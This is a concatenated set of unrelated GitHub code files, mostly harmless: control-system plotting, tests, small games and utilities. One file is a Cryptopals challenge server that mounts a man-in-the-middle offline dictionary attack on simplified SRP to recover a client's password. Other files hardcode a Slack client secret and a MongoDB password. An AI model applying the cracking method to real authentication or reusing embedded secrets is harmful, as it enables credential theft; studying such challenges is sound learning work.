define expression for SoCcoeff\nSoCcoeff_f = cs.Function('SoCcoeff',[v.sym for v in model.x+model.y],[1.0 - (SoC_max-SoC_min)/(SoC_max-SoC.sym + SoC_max-SoC_min)],\n [v.nme for v in model.x+model.y],['out'])\n\n# main parameters\nRTL = 0 # relaxed tail length\nPHL = 18 # prediction window length\nshift_size = 1\nnum_iterations = 12\nsubsolverName = 'CLP'\nconservativism_level = 2\nnlpProcesses = 1\nmipProcesses = 1\nshift_style = None\nshift_style = \"constraintsOnly\"\n# shift_style = \"warmStart\"\n# shift_style = \"fullRTI\"\n\nmpc_options = {'max_iteration_time':oc.inf,\n 'hbbSettings':{'verbose':True,'conservativismLevel':conservativism_level,\"relativeGapTolerance\":1e-4,\n 'nlpProcesses':nlpProcesses,'mipProcesses':mipProcesses,'nlpStepType':('OAnlpStep',),\n 'nlpSettings':{'subsolverName':'IPOPT','constr_viol_tol':1e-5},\n 'mipSettings':{'verbose':True,\n 'withBoundsPropagation':False,\n 'subsolverSettings':{'subsolverName':subsolverName}}},\n 'integration_opts':{'schema':'rk4','n_steps':1},\n 'prediction_horizon_length':PHL,'relaxed_tail_length':RTL,\n 'printLevel':1}\n\n\n\n# generate the mpc controller\nmpc_controller = oc.MPCcontroller(model,mpc_options)\n\n# define the first measured state\nmeasured_state = {'SoC':SoC_start,'F':TNK_Finit,'OFFstate':1.0,'GEARstate':0.0}\n\n# collect the first parameters values\nnew_input_values = {'t':time_vec[:PHL+RTL+1],\n 'cycle':cycle_dat[:PHL+RTL+1],\n 'dcycle':dcycle_dat[:PHL+RTL+1],\n 'SoCcoeff':SoCcoeff_f.call(measured_state)['out']*cs.DM.ones(PHL+RTL+1)}\n\n# create container for results\nresults = {'t':cs.DM(list(range(num_iterations-1+PHL+1)))};\nfor i in model.i: results[i.nme] = cs.DM.zeros(num_iterations-1+PHL+1)\nfor v in model.x + model.y + model.a: results[v.nme] = cs.DM.zeros(num_iterations-1+PHL+1)\nfor v in model.u+model.v: results[v.nme] = cs.DM.zeros(num_iterations-1+PHL)\n\n\n# MPC iterations\nk0 = 0\nstart_time = time()\nfor i in range(num_iterations):\n\n print('MPC: Iteration =',i+1)\n\n # perform mpc iteration\n iteration_objective, 
iteration_results = mpc_controller.iterate(shift_size,measured_state,new_input_values,shift_style,0)\n\n print(\"MPC: Optimal Objective =\",iteration_objective)\n\n # fill in the newest results\n for v in model.x + model.y + model.a:\n results[v.nme][k0:k0+PHL+1] = iteration_results[v.nme][:PHL+1]\n for v in model.u + model.v:\n results[v.nme][k0:k0+PHL] = iteration_results[v.nme][:PHL]\n\n # update the initial timestep\n k0 += shift_size\n\n # update the measured state\n for v in model.x: measured_state[v.nme] = results[v.nme][k0]\n for v in model.y: measured_state[v.nme] = round(float(results[v.nme][k0]))\n\n # update the input values\n new_input_values = {'t':time_vec[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'cycle':cycle_dat[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'dcycle':dcycle_dat[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'SoCcoeff':SoCcoeff_f.call(measured_state)['out']*cs.DM.ones(shift_size)\n }\n\nprint('\\n---------------------------------------------------------------------------------')\nprint('Solution time: ',time()-start_time)\nprint('Timings: ',mpc_controller.stats['times'])\nprint('#Solves: ',mpc_controller.stats['num_solves'])\nprint('---------------------------------------------------------------------------------\\n')\n\n\n# ------------------------------------------------\n# Plot Results\n# ------------------------------------------------\nfig_name = 'MIRTOC_'+str(start)+':'+str(dt)+':'+str(start+wl)\n\n\ntime_vec = results['t']\nTreq_f = cs.Function('Treq',[cs.vertcat(*[i.sym for i in model.i])],[Treq])\nTreq_f = Treq_f.map(time_vec.numel())\nTreq_v = Treq_f(oc.list_horzcat([results[i.sym.name()] for i in model.i]).T).T\n\nfor k in range(len(R)):\n results['R'+str(k+1)] = R[k]\nresults['Rem'] = Rem\n\nplt.close(fig_name)\nfig = plt.figure(fig_name)\n\n\nbase_font ={'family' : 'sans','size' : 12}\nmpl.rc('font', **base_font)\nfont_titles = {'rotation':'vertical','fontsize':18,'va':'center','ha':'center','weight':'bold'}\nfont_units = {'rotation':'vertical','fontsize':14,'va':'center','ha':'center'}\nfont_results = {'weight':'bold','size':20,'ha':'center','va':'center'}\n\ntext_space = 0.015\nx0 = 0.15\nxf = .85\ny0 = 0.09\nyf = 0.99\n\nn_plots = 5\n\nrem = results['Rem']\nrice = sum([results['R'+str(i+1)]*results['G'+str(i+1)] for i in range(len(R))])\nwr = cycle_dat[:time_vec.numel()]/wheelR\ndsc_labels = ['OFF','G1','G2','G3','G4','G5']\n\n# base layout\nax_ = fig.add_axes([x0+2*text_space,y0,(xf-x0)-6*text_space,yf-y0],frameon = True)\nax_.xaxis.set_visible(True)\nax_.yaxis.set_visible(False)\nax_.set_ylim([0,1])\nax_.grid(axis='x')\nax_.autoscale(enable=True,axis='x',tight=True)\nax_.patch.set_alpha(0)\n\n# prepare the space\nunits = []\ntitles = []\nax = []\nfor p in range(n_plots):\n ax.append(fig.add_axes([x0+2*text_space,y0 + p*(yf-y0)/n_plots,(xf-x0)-6*text_space,(yf-y0)/n_plots],sharex=ax_,frameon = False))\n ax[-1].yaxis.set_visible(True)\n ax[-1].xaxis.set_visible(False)\n ax[-1].set_axisbelow(True)\n ax[-1].patch.set_alpha(0)\n ax[-1].yaxis.tick_right()\n ax[-1].yaxis.set_label_position('right')\n ax[-1].grid(axis='y')\n ax[-1].autoscale(enable=True,axis='x',tight=True)\n titles.append('')\n units.append('')\n\n# powers\ndata2 = results['Pem']\ndata3 = results['Pice']\ndata1 = data2 + data3\n\nmin_data = oc.dm_min(cs.vertcat(data1,data2,data3))\nmax_data = oc.dm_max(cs.vertcat(data1,data2,data3))\nticks_period = 10\n\nyticks = [ticks_period*t for t in 
range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[4].set_yticks(yticks)\nax[4].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[4] = 'Powers'\nunits[4] = 'kW'\n\nax[4].step(time_vec,cs.vertcat(data1[0],data1), label = 'Requested', color='k',linewidth=2)\nax[4].step(time_vec,cs.vertcat(data2[0],data2), label='EM',linewidth=2,color=(0,0,0.7))\nax[4].step(time_vec,cs.vertcat(data3[0],data3), label='ICE (after GB)',linewidth=2,color=(0.9,0,0))\n\nax[4].legend(loc='upper left',ncol = 3,fontsize = 14)\n\n\n# speeds\ndata1 = wr[:-1]*rem*30/np.pi\ndata2 = wr[:-1]*rice*30/np.pi\ndata3 = ICE_wrat*cs.DM.ones(wr.numel()-1,1)*30/np.pi\n\n\nmin_data = oc.dm_min(cs.vertcat(data1,data2))\nmax_data = oc.dm_max(cs.vertcat(data1,data2))\n\nif max_data > 2000:\n ticks_period = 1000\nelse:\n ticks_period = 500\n\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[3].set_yticks(yticks)\nax[3].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[3] = 'Speeds'\nunits[3] = 'RpM'\n\nax[3].step(time_vec,cs.vertcat(data1[0],data1), label='EM',linewidth=2,color=(0,0,0.7))\nax[3].step(time_vec,cs.vertcat(data2[0],data2), label='ICE (before GB)',linewidth=2,color=(0.9,0,0))\nax[3].legend(loc='upper left',ncol = 3,fontsize = 14)\n\n# SoC\ndata = 100*results['SoC']\nmin_data = oc.dm_min(data);\nmax_data = oc.dm_max(data)\nticks_period = int(2*(max_data-min_data)+.5)/10\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[2].set_yticks(yticks)\nax[2].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[2] = 'SoC'\nunits[2] = '%'\n\nax[2].plot(oc.squeeze(time_vec),oc.squeeze(data),linewidth=2,color=(.4,.6,0))\n\n\n# discrete variables\ndsc_ass = cs.DM()\nfor i,l in enumerate(dsc_labels):\n dsc_ass = oc.horzcat(dsc_ass,results[l])\n\n\n\nax[1].set_ylim(-.5,len(dsc_labels)+.5)\nyticks = [0] + [t+1 for t in range(len(dsc_labels))]\nax[1].set_yticks(yticks)\nax[1].set_ylim(min(yticks)-.5,max(yticks)+.5)\nax[1].set_yticklabels('')\nax[1].set_yticks([t +.5 for t in range(len(dsc_labels))],minor=True)\nax[1].set_yticklabels(dsc_labels,minor=True)\n\ntitles[1] = 'Discrete C.'\n\n\ncmap = cm.nipy_spectral\ncolors = [(.2,.2,.2)] +[cmap(int(i*cmap.N/len(dsc_labels))) for i in range(1,len(dsc_labels))]\n\nfor i in range(len(dsc_labels)):\n for t in range(time_vec.numel()-1):\n if dsc_ass[t,i] > 1e-4:\n ax[1].add_patch(ptc.Rectangle(xy=(time_vec[t],i),width=time_vec[t+1]-time_vec[t],height=dsc_ass[t,i],facecolor=colors[i],edgecolor='k',fill=True))\n ax_.add_patch(ptc.Rectangle(xy=(time_vec[t],0),width=time_vec[t+1]-time_vec[t],height=1,facecolor=list(colors[i])[:3]+ [float(.1*dsc_ass[t,i])],edgecolor='none',fill=True))\n\n\n# driving cycle\ndata = 3.6*cycle_dat[:time_vec.numel()]\nmin_data = oc.dm_min(data)\nmax_data = oc.dm_max(data)\nticks_period = 10\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[0].set_yticks(yticks)\nax[0].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[0] = 'Cycle'\nunits[0] = 'km/h'\n\nax[0].plot(time_vec,data,linewidth=2,color='k')\n\nax0 = fig.add_axes([0,0,1,1],frameon=False)\nfor p in range(n_plots):\n rect = 
ptc.Rectangle(xy=(x0,y0+p*(yf-y0)/n_plots),width=xf-x0,height=(yf-y0)/n_plots,facecolor='w',edgecolor='k',fill=False)\n ax0.add_patch(rect)\n ax0.text(x0+text_space,y0+(p+.5)*(yf-y0)/n_plots,titles[p],font_titles)\n ax0.text(xf-text_space,y0+(p+.5)*(yf-y0)/n_plots,units[p],font_units)\n\n\nplt.savefig(\"figure.png\")\nplt.show()\n# manager = plt.get_current_fig_manager()\n# manager.window.showMaximized()\n","repo_name":"MassimoDM/MIRT_OC","sub_path":"examples/parallel_hybrid_power/parallel_hybrid_power.py","file_name":"parallel_hybrid_power.py","file_ext":"py","file_size_in_byte":16953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"62920919","text":"import yatest.common\nimport yaml\n\n\ndef test_versions_format():\n \"\"\"\n test that versions.sls is Dict[str, Dict[str, str]]\n \"\"\"\n with open(yatest.common.source_path('cloud/mdb/salt/pillar/versions.sls')) as inp:\n versions = yaml.safe_load(inp)\n assert isinstance(versions, dict), 'versions.sls should be a dict'\n for env, env_pins in versions.items():\n assert isinstance(env, str), f'env key should be a str. got {env!r}'\n assert isinstance(env_pins, dict), f'{env} value should be a dict'\n for component, pin in env_pins.items():\n assert isinstance(component, str), f'component should be a str. got {component!r}'\n assert isinstance(pin, str), f'pin should be a str. got {pin!r} for {component!r}'\n if pin == 'trunk':\n continue\n assert pin.isdigit(), f'pin {pin!r} for {component!r} should be \\'trunk\\' or svn revision'\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/salt-tests/versions/test_versions_format.py","file_name":"test_versions_format.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37612173613","text":"import ast\n# import astpretty\n\n\nx=\"1+12+3\"\n\n# 1*2*3+5\n\nexp=[]\n\nprev=\"\"\ncurr=\"\"\n\nfor i in x:\n # print (i)\n if(i.isdigit()):\n if(prev.isdigit()):\n curr=curr+i\n else:\n curr=i\n else:\n exp.append(int(curr))\n curr=\"\"\n exp.append(i)\n prev=i\n\nexp.append(curr)\n\nprint(exp)\n\nprint(exp[0]+10)\nif(exp[1]==\"+\"):\n print(True)\n\n\n\nclass AST():\n pass\n\n\nclass BinOp(AST):\n def __init__(self, left, op, right):\n self.left = left\n self.right = right\n self.op=op\n\n\nclass Num(AST):\n def __init__(self, value):\n self.value = value\n\n\n\n","repo_name":"terrasjones42/Arith","sub_path":"Tinker.py","file_name":"Tinker.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5906144481","text":"import collections as _collections\n\nimport os\n\nstate = {\n # Previous interaction with the file-system is recorded here,\n # for reuse in subsequent calls to a function holding SHIFT\n \"history\": {},\n\n # Host plug-ins are recorded for automatic uninstall\n \"pluginsLoaded\": set(),\n\n # Reloader modules\n \"registeredModules\": _collections.OrderedDict(),\n\n \"teardown\": [],\n\n}\n\n\ndef unload():\n \"\"\"Unload every module\n\n This enables re-import of this package without restarting the\n interpreter, whilst also accounting for import order to avoid/bypass\n cyclical dependencies.\n\n \"\"\"\n\n import sys # Local import, to prevent leakage\n\n for key, value in sys.modules.copy().items():\n if key.startswith(__name__):\n 
sys.modules.pop(key)\n","repo_name":"ue4plugins/MayaMLDeformer","sub_path":"Source/MLDeformer/mldeformer/generator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"37886435437","text":"\"\"\"\nmountain_car_continuous_ddpg.py\n\"\"\"\n\nimport gym\nfrom ddpg import DDPG\nimport numpy as np\n\n\nNUM_EPISODES = 3000\nMAX_IT = 1000\nRENDER_FLAG = True\n\nif __name__ == '__main__':\n env = gym.make('MountainCarContinuous-v0')\n #env = gym.make('Pendulum-v0')\n #env = gym.make('CartPole-v1') # Discrete case\n ddpg_agent = DDPG(env, device='/GPU:0')\n ddpg_agent.run(NUM_EPISODES, MAX_IT, RENDER_FLAG)\n #ddpg(env, n_episodes=NUM_EPISODES, max_t=MAX_IT)\n\n","repo_name":"EmanueleGiacomini/rl_ddpg","sub_path":"mountain_car_continuous_ddpg.py","file_name":"mountain_car_continuous_ddpg.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27067032076","text":"#!/usr/bin/python3\n\"\"\"\nWrite a function that takes a comma-separated string\nand returns a last element (separated by a last comma)\nor the entire string if there is no comma in it.\n\"\"\"\n\n\ndef split_string(input_str):\n \"\"\"\n Parse input string and returns last comma separated element.\n In case no comma found, all string is returned.\n\n Args:\n input_str(str): input string that will be parsed\n\n Returns:\n str: last comma separated element,\n or all string in case no comma found.\n \"\"\"\n return input_str.split(',')[-1]\n\n\nif __name__ == '__main__':\n print(split_string(\"some, comma, separated, string.\"))\n print(split_string(\"some string without comma.\"))","repo_name":"mstepovanyy/python-training","sub_path":"course/lesson03/task05/advanced_string_splitting.py","file_name":"advanced_string_splitting.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23771526531","text":"from pals33 import modular_pow\r\nfrom pals36 import hmac_sha256, h\r\nfrom flask import Flask, request, jsonify\r\nfrom hashlib import sha256\r\nfrom random import randint\r\nimport requests\r\n\r\n\r\n# Set 5 Challenge 38 Server\r\n# Made with OpenSSL\r\nN = int(\"008c5f8a80af99a7db03599f8dae8fb2f75b52501ef54a827b8a1a586f14dfb20d6b5e2ff878b9ad6bca0bb9\"\r\n \"18d30431fca1770760aa48be455cf5b949f3b86aa85a2573769e6c598f8d902cc1a0971a92e55b6e04c4d07e\"\r\n \"01ac1fa9bdefd1f04f95f197b000486c43917568ff58fafbffe12bde0c7e8f019fa1cb2b8e1bcb1f33\", 16)\r\n\r\n# Client & server check these\r\ng = 2\r\nk = 3\r\n\r\n# Server computes these vals\r\nb = randint(0, N - 1)\r\nB = modular_pow(g, b, N)\r\nsalt = str(randint(0, 2**32 - 1))\r\n\r\n# Values -> update later\r\nv = None\r\nA = None\r\nS, K = None, None\r\n\r\napp = Flask(__name__)\r\n\r\n# MITM attack to SRP\r\n@app.route('/', methods=['POST'])\r\ndef mitm_attack():\r\n global v, A, B, S, K\r\n\r\n if request.method == 'POST':\r\n # Get data sent by client as json\r\n post_data = request.get_json()\r\n\r\n # If we are in first (C->S) post:\r\n if 'I' in post_data and 'A' in post_data:\r\n # Get I & A sent by client\r\n I = post_data.get('I')\r\n A = post_data.get('A')\r\n\r\n # Send user salt & B (first S->C)\r\n return jsonify(salt=salt, B=B)\r\n\r\n # If we are in second (C->S) post:\r\n elif 'hm' in post_data:\r\n\r\n # Get client HMAC\r\n client_hm = 
post_data.get('hm')\r\n\r\n            # Add words from website with 10,000 words\r\n            with open(\"10kwords\") as dictionary:\r\n                candidates = dictionary.readlines()\r\n\r\n            # Try password candidates\r\n            for candidate in candidates:\r\n\r\n                # Strip word\r\n                candidate = candidate.rstrip()\r\n\r\n                # Compute u\r\n                u = h(str(A) + str(B))\r\n                v = modular_pow(g, h(salt + candidate), N)\r\n\r\n                # Compute S & K\r\n                S = modular_pow(A * modular_pow(v, u, N), b, N)\r\n                K = sha256(str(S).encode()).digest()\r\n\r\n                # Compute HMAC\r\n                candidate_hm = hmac_sha256(K, salt.encode())\r\n\r\n                if candidate_hm == client_hm:\r\n                    print(\"The password is:\", candidate)\r\n                    return \"OK\", 200\r\n\r\n    return \"BAD\", 500\r\n\r\n\r\n# Main Function\r\nif __name__ == '__main__':\r\n    \"\"\"CryptoPals Set 5 #38 Server\"\"\"\r\n    \"\"\"Brute force attack, can have long delay\"\"\"\r\n    app.run()\r\n","repo_name":"jomens235/cryptography_challenges-cryptopals","sub_path":"Set 5/pals38_server.py","file_name":"pals38_server.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"600331903","text":"# Quiz\r\nfrom random import *\r\na = list(range(1,51))\r\nb = sample(list(range(5,51)),1)\r\nx = a[0]\r\ny = b[0]\r\n\r\n\r\nx = 0\r\nfor y in list(range(1,51)) :\r\n    z = sample(range(5,51),1)\r\n    if 5<=z[0]<=15 :\r\n        print(\"[o]Customer {0} (time taken: {1} min)\".format(y,z[0]))\r\n        x=x+1\r\n    else:\r\n        print(\"[]Customer {0} (time taken: {1} min)\".format(y,z[0]))\r\n\r\n\r\nprint(x,end=\" customers\") \r\n    \r\n    \r\n    \r\n","repo_name":"hsy0511/0315-python","sub_path":"0315-15.py","file_name":"0315-15.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"403235510","text":"# URI Online Judge | 1221\nfrom math import sqrt\nN = int(input())\nfor i in range (N):\n    num = int(input())\n    if num > 1:\n        resultado = 'Prime'\n        for d in range(2, int(sqrt(num)+1)):\n            if num % d == 0:\n                resultado = 'Not Prime' # if it has any divisor between 2 and the square root, it is composite\n        print(resultado)","repo_name":"sammycosta/uri-python","sub_path":"uri_1221.py","file_name":"uri_1221.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16341821934","text":"import django_filters\nfrom rest_framework import filters\n\nfrom pentest_project.models import Action\n\n\nclass ArrayFilter(django_filters.CharFilter):\n    def __init__(self, field_name=None, lookup_expr='contains', *, label=None,\n                 method=None, distinct=False, exclude=False, **kwargs):\n        super().__init__(field_name=field_name, lookup_expr=lookup_expr, label=label,\n                         method=method, distinct=distinct, exclude=exclude, **kwargs)\n\n    def filter(self, qs, value):\n        if value:\n            value = value.split(',')\n        else:\n            value = []\n        return super().filter(qs, value)\n\n\nclass ActionFilter(django_filters.FilterSet):\n    status__in = ArrayFilter(field_name='status', lookup_expr='in')\n    id__in = ArrayFilter(field_name='id', lookup_expr='in')\n\n    class Meta:\n        model = Action\n        fields = ('parent', 'project', 'status', 'created_at', 'updated_at')\n\n\nclass FileTomlSearchFilter(filters.SearchFilter):\n    def filter_queryset(self, request, queryset, view):\n        search_terms = self.get_search_terms(request)\n        if not search_terms:\n            return queryset\n        search_term = search_terms[0].lower()\n        return list(filter(lambda x: search_term in x.filename.lower() or search_term in 
x.name.lower(), queryset))\n","repo_name":"Nekmo/pentest-studio","sub_path":"pentest_project/api/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"21143789179","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\nstairs = [0]\n\nfor _ in range(N):\n    stairs.append(int(input()))\n\nmemo = [0] * (N+1)\nmemo[1] = stairs[1]\nif N == 1:\n    print(memo[1])\nelif N == 2:\n    memo[2] = stairs[1] + stairs[2]\n    print(memo[2])\nelse:\n    memo[2] = stairs[1] + stairs[2]\n    for i in range(3, N+1):\n        memo[i] = max(memo[i-2], stairs[i-1]+memo[i-3]) + stairs[i]\n    \n    print(memo[-1])","repo_name":"ratataca/algorithm-study","sub_path":"week 10. DP & 파싱(문자열 처리)/백준/1. 2579 계단오르기/ratataca.py","file_name":"ratataca.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"10131978457","text":"import os\nimport message\n\nfrom slackclient import SlackClient\n\nauthed_teams = {}\n\nclass Script(object):\n\n    def __init__(self):\n        super(Script, self).__init__()\n        self.name = \"NarvalSimu\"\n        self.emoji = \":robotface:\"\n\n        self.oauth = {\"client_id\": \"160796522983.194115916214\",\n                      \"client_secret\": \"10879f8fcb356a3942c3a96a433335e0\",\n                      \"scope\": \"commands\"}\n        self.verification = \"\"\n        self.client = SlackClient(\"\")\n        self.messages = {}\n\n\n    def auth(self, code):\n\n        auth_response = self.client.api_call(\"oauth.access\",\n                                             client_id=self.oauth[\"client_id\"],\n                                             client_secret=self.oauth[\"client_secret\"],\n                                             code=code\n                                             )\n        team_id = auth_response[\"team_id\"]\n        authed_teams[team_id] = {\"bot_token\":\n                                 auth_response[\"bot\"][\"bot_access_token\"]}\n\n        self.client = SlackClient(authed_teams[team_id][\"bot_token\"])","repo_name":"NeoNarval/NeoNarval","sub_path":"DRS/SRC/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15146695109","text":"from fractions import Fraction\r\n#x/y??????m?n?n/2\r\nx,y=map(int,input().split(\"/\"))\r\ni=1\r\nxdivy=Fraction(x,y)\r\nnkari=2*x//y\r\nnkari2=2*x//y+1\r\nflag=False\r\nsumkari=nkari*(nkari+1)//2\r\nsumkari2=nkari2*(nkari2+1)//2\r\n#print(xdivy)\r\nanskari1=Fraction(nkari*(nkari+1),2)-xdivy*nkari\r\nanskari2=Fraction(nkari2*(nkari2+1),2)-xdivy*nkari2\r\nflag=False\r\nif anskari1.denominator==1 and anskari1!=0 and nkari!=0:\r\n    flag=True\r\n    print(nkari,anskari1)\r\nif anskari2.denominator==1 and anskari2!=0 and nkari2!=0:\r\n    flag=True\r\n    print(nkari2,anskari2)\r\nif not flag:\r\n    print(\"Impossible\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc004/C/1654778.py","file_name":"1654778.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
{"seq_id":"25807920995","text":"import turtle\nimport time \nfrom turtle import * \nimport random\n\nturtle.bgcolor(\"lightgreen\")\n\nt1 = Turtle()\nt1.penup()\nt1.shape(\"turtle\")\nt1.left(90)\nt1.speed(0)\nt1.color(\"red\")\n\n\nt2 = t1.clone()\nt2.color(\"yellow\")\n\nt3 = t1.clone()\nt3.color(\"purple\")\n\nt4 = t1.clone()\nt4.color(\"white\")\n\nt1.goto(-200, -200)\nt2.goto(160,-200)\nt3.goto(-70,-200)\nt4.goto(50,-200)\n\n\n# Finish\n\n\nfinish_1 = 
Turtle()\nfinish_1.penup()\nfinish_1.goto(-200,200)\nfinish_1.pendown()\nfinish_1.circle(20)\nfinish_1.hideturtle()\n\n\nfinish_2 = Turtle()\nfinish_2.penup()\nfinish_2.goto(160,200)\nfinish_2.pendown()\nfinish_2.circle(20)\nfinish_2.hideturtle()\n\n\nfinish_3 = Turtle()\nfinish_3.penup()\nfinish_3.goto(50,200)\nfinish_3.pendown()\nfinish_3.circle(20)\nfinish_3.hideturtle()\n\n\nfinish_4 = Turtle()\nfinish_4.penup()\nfinish_4.goto(-70,200)\nfinish_4.pendown()\nfinish_4.circle(20)\nfinish_4.hideturtle()\n\n\ndef main():\n    for x in range(300):\n        t1.fd(random.randrange(10))\n        t2.fd(random.randrange(10))\n        t3.fd(random.randrange(10))\n        t4.fd(random.randrange(10))\n\n        if (t1.position()[1]) >= 220:\n            style = ('Courier', 25, 'italic')\n            turtle.write('The red turtle is the winner!', font=style, align='center')\n            turtle.hideturtle()\n            break\n\n        elif (t2.position()[1]) >= 220:\n            style = ('Courier', 25, 'italic')\n            turtle.write('The yellow turtle is the winner!', font=style, align='center')\n            turtle.hideturtle()\n            break\n\n        elif (t3.position()[1]) >= 220:\n            style = ('Courier', 25, 'italic')\n            turtle.write('The purple turtle is the winner!', font=style, align='center')\n            turtle.hideturtle()\n            break\n\n        elif (t4.position()[1]) >= 220:\n            style = ('Courier', 25, 'italic')\n            turtle.write('The white turtle is the winner!', font=style, align='center')\n            turtle.hideturtle()\n            break\n    \n\n    \nmain()\n\n\n\n\n\nturtle.mainloop()","repo_name":"AdemZecak/Turtle-Race","sub_path":"vjezba_turtle.py","file_name":"vjezba_turtle.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"11554980206","text":"\n\n\nclass Methodize(object):\n\n    _element = None\n    \n    _numbers = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten']\n    \n    def __init__(self, dict_):\n        object.__setattr__(self, '_element', dict_)\n\n    def __getattr__(self, attr):\n\n        if type(self._element) is list:\n            if attr in dir(list):\n                return list.__getattribute__(self._element, attr)\n            if attr in self._numbers:\n                return self[self._numbers.index(attr)]\n            if attr == 'first':\n                return self[0]\n            if attr == 'last':\n                return self[-1]\n        if type(self._element) is dict and attr in dir(dict):\n            return dict.__getattribute__(self._element, attr)\n        \n        return self[attr]\n\n    def __setattr__(self, attr, value):\n        self[attr] = value\n\n    def __getitem__(self, item):\n        response = self._element[item]\n        if type(response) in [dict, list]:\n            return Methodize(response)\n        else:\n            return response\n\n    def __setitem__(self, attr, value):\n        self._element[attr] = value\n","repo_name":"nsigustavo/methodize","sub_path":"methodize.py","file_name":"methodize.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"23970296094","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nfrom pymongo import MongoClient\nimport pandas as pd\n\n\ndef clinvar_required_cols(rec, cln_rec):\n    rec[\"Clinvar ALLELEID\"] = cln_rec[\"ALLELEID\"] if \"ALLELEID\" in cln_rec.keys() else \"-\"\n    rec[\"Clinvar CLNDN (Disease_Name)\"] = cln_rec[\"CLNDN\"] if \"CLNDN\" in cln_rec.keys() else \"-\"\n    rec[\"Clinvar CLNSIG\"] = cln_rec[\"CLNSIG\"] if \"CLNSIG\" in cln_rec.keys() else \"-\"\n    rec[\"Clinvar CLNREVSTAT\"] = cln_rec[\"CLNREVSTAT\"] 
if \"CLNREVSTAT\" in cln_rec.keys() else \"-\"\n rec[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = cln_rec[\n \"MC\"] if \"MC\" in cln_rec.keys() else \"-\"\n return rec\n\n\nclass Mongo:\n\n # used a hg19 dbSNP vcf file and same for the refGene GTF file to extract the gene\n def __init__(self, db_path=\"../../databases/00-All.vcf\",\n rs_input=\"../../databases/autism_records/input_autism-database_rsid.tsv\",\n f_input=\"/home/bioinfo3/Desktop/databases/autism_records/autism-Unannotated-records-based_rsid.tsv\",\n f2_input=\"/home/bioinfo3/Desktop/databases/autism_records/autism-database - autism_SNVchr_pos.tsv\"):\n self.unannotated_record = f_input\n self.input_file1 = f2_input\n self.input_file = rs_input\n self.client = MongoClient(\"192.168.0.155\",\n username='admin',\n password='bioinfo3')\n self.db = self.client.clinical_databases\n self.col = self.db.dbsnp\n self.cln_col = self.db.clinvar\n\n def fetch_records(self):\n with open(self.input_file, \"r\") as fh:\n dbsnp_data_hg19 = []\n dbsnp_data = []\n header = fh.readline()\n print(header)\n count = 0\n for rows in fh:\n row = rows.strip().split(\"\\t\")\n # fetch the records from the dbSNP and clinvar database based on the genes name...\n doc = self.col.find_one({\"ID\": row[0]})\n if doc is None:\n if row[2] == \"-\":\n pass\n else:\n doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\" + row[1]}, {\"POS\": int(row[2])}]})\n if doc is None:\n dbsnp_data.append(row)\n else:\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, 